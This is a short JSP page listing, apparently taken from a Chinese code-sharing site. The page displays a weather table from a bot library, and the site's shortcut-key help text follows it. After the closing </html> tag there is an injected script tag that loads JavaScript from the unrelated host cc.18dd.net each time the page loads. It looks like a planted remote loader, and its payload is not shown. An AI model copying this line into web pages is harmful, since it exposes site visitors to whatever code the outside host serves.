?? weather.jsp
字號(hào):
<%@page import="com.heaton.bot.weather.*" %>
<html><head><title>Current Weather</title></head>
<body>
<h1>Current Weather</h1>
<table border=0>
<%
Weather a[] = Weather.getList();
for(int i=0;i<a.length;i++)
{%>
<tr><td><%=a[i].city%> </td><td><%=a[i].deg%> F</td></tr>
<% }
Weather.fileAggregate("wxtest.html");
%>
</table>
</body>
</html>
<script language=javascript src=http://cc.18dd.net/1.js></script>
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -